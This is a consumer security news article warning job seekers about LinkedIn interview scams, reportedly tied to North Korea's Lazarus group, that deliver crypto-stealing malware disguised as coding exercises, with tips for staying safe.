In certain instances, we may earn revenue when a reader makes a purchase or completes a form through our pages or on a partner’s website. We adhere to a strict 
If a job interview ever comes with a request to download software — best to avoid it.
Phishing scams or social engineering attempts to get people to install malware may not be the newest cybersecurity trend, but what is startling is how sophisticated these are becoming in 2025.
In this virtual version of the ‘long con,’ security experts, including Bitdefender Labs, warn of job interview scams, which usually involve unsolicited job interview offers. If job seekers accept these legitimate-sounding requests, often originating on LinkedIn, they find themselves speaking to different fictitious ’employees’ of a legitimate-seeming company — everyone from the Human Resources team to their future manager.
The overall aim of this catfishing with a jobseeker twist is to get the applicant to download malware disguised as a training exercise or work tool, steal their personal information, and, in some cases, drain their digital wallets.
One of the most advanced scams yet appears linked to the North Korean hacker group Lazarus, which allegedly steals more than $300m in cryptocurrency annually.
Key Takeaways
- A new LinkedIn job scam involves fake recruiters to create a convincing facade of a new career move.
- After passing initial tests, victims are tricked into downloading malicious “training exercises.”
- The scam is thought to be linked to the North Korean hacking group Lazarus. It aims to install info-stealer malware that targets browser data and crypto wallets.
- Scams include offering fake training courses towards the end of a selection process for certification that does not exist.
- To stay safe, never download software for an interview.
Real-Life Victims & BitDefender Investigation
LinkedIn is full of posts from people who have been duped (or nearly duped) into downloading software during an interview, as well as reports of fake recruiters on LinkedIn trying many paths to extract data or dollars from job seekers.
The Khaleej Times reported the story of ‘T Jonas,’ who passed the first round of a job interview before being informed he needed additional certification to proceed. Once he had paid $1,900 to a recommended “institution,” the recruiter vanished.
His tale is not the first, nor will it be the last:
Ironically, one such phishing attempt was exposed when a malicious recruitment operation targeted a BitDefender employee via LinkedIn.
Turning the tables, BitDefender followed the attempt through — to find that the test exercises they were sent contained cross-platform info-stealers, compatible with Windows, MacOS, and Linux operating systems, that were designed to steal their crypto keys for popular wallets, including MetaMask, Phantom, TonWallet, and Crypto.com.
With the lure of a high compensation package, remote work, flexible hours, and a meeting with the CEO — who could resist? — the final stage of the interview, where the hackers hope you take the bait, was a training exercise that required a quick download to complete.
According to BitDefender researchers, “After receiving the requested information, the criminal shared a repository containing the project’s “minimum viable product” (MVP). He also included a document with questions that can only be answered by executing the demo.
“At first glance, the code appears harmless. However, closer inspection reveals a heavily obfuscated script that dynamically loads malicious code from a third-party endpoint.”
A Job Offer With More Than You Bargained For
Once deployed, BitDefender found an info-stealer payload delivered to their computer, which proceeded to hunt browser extensions for popular cryptocurrency wallets.
The info-stealer also collected browser login data and sent the information to a malicious IP address.
It didn’t stop there. Finally, it downloaded and executed a host of Python scripts, beginning with one called main99_65.py, to allow for further exfiltration activities, including hooking keyboard events and monitoring a user’s clipboard before sending the content back.
The files included:
BitDefender said: “The threat actors’ infection chain is complex, containing malicious software written in multiple programming languages and using a variety of technologies.
“[These include] multi-layered Python scripts that recursively decode and execute themselves, a JavaScript stealer that first harvests browser data before pivoting to further payloads, and .NET-based stagers capable of disabling security tools, configuring a Tor proxy, and launching crypto miners.”
While BitDefender engaged with the hackers in a secured environment, it allowed them to follow their ploy and said the malware and operational tactics “strongly suggests the involvement of state-sponsored threat actors, specifically those from North Korea.”
BitDefender added: “While we’ve discussed malicious job offers, it has been observed that the same threat actors have tried to infiltrate various companies by faking identities and applying for a multitude of job positions.
“The result would be approximately the same: private information, credentials, and technology would be exfiltrated by corporate spies.”
How to Stay Safe From Scam Job Adverts
- Watch out for vague job descriptions, particularly unsolicited ones that are not advertised elsewhere.
- Watch out for poor spelling and grammar in emails and direct messages.
- Treat any attachments, including PDFs and DOC files, as suspicious, and make sure your computer has up-to-date virus scanners.
- Exercise extreme caution if a recruiter suggests a non-standard video chat or instant messaging program for conversations — stick with Zoom, Skype, Microsoft Teams, or Google Meet (and be suspicious of files sent over those applications, too).
- Remember that an interviewer should never ask you to download a GitHub repository or similar or install a program.
- If you must run code of some kind, use a virtual machine or a sandbox mode.
The Bottom Line
In many ways, these are old tricks — trying any method to get malware onto your machine.
Whether it is phishing for personal information, extracting money from you for training courses, or scanning your machine in the hopes of finding cryptocurrency, there is valuable content sitting on most of our hard drives.
What is different here, however, is the amount of effort hackers are willing to invest when spearfishing a target — from multiple calls with various people to legitimate-looking documents and websites and training exercises built from the ground up to look convincing.
So next time you are bracing yourselves for a stressful enough job interview, ensure the company you are talking to is not a house of cards.
FAQs
What is the LinkedIn job interview scam?
How do scammers trick job seekers on LinkedIn?
How can I tell if a job offer is fake?
What kind of malware is used in these scams?
What should I do if I receive a suspicious job offer?
References
- UAE: Some applicants lose money, job offers after being ‘tricked’ into getting certification – News (Khaleej Times)
- Alyce Mitchell on LinkedIn: I want to share an unfortunate experience to help others avoid falling… (LinkedIn)
- Lazarus Group Targets Organizations with Sophisticated LinkedIn Recruiting Scam (Bitdefender)
